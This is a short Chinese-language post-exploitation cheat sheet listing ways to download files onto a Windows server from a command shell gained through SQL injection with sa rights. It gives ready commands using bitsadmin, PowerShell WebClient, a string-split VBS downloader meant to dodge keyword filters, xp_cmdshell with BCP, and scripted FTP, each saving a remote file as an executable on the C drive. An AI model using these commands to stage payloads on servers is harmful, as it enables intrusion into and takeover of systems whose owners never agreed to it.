本文指在记录一些cmdshell下的download方法,例如:sa权限的注射点。
0x1 bitsadmin
1 |
bitsadmin /transfer n /download /priority normal http://img.firefoxchina.cn/2016/01/7/201601251124490.png C:\test.exe |
请注意C盘是否有写入权限
0x2 powershell
1 |
powershell -command "(new-object System.Net.WebClient).DownloadFile('http://img.firefoxchina.cn/2016/01/7/201601251124490.png', 'C:\test.exe')" |
需要服务器支持powershell
0x3 vbs下载
1 |
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^","http://img.firefoxchina.cn/2016/01/7/201601251124490.png",0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile "c:\test.exe",2 >> c:\d.vbs |
0x4 利用sqlserver导出文件
1 2 3 4 |
drop table test1 create table test1(c char(1000)) insert into test1(c)values((select CONVERT(varchar(64),0x74657374,0))) EXEC master..xp_cmdshell 'BCP "select * from test.dbo.test1" queryout c:\tset.exe -c -T ' |
0x5 ftp下载文件
ftp -s:download.txt
1 2 3 4 5 6 7 |
open [host] [username] [password] bin lcd [local path] get [filename] bye |
感谢darkray,hrayha师傅,欢迎补充。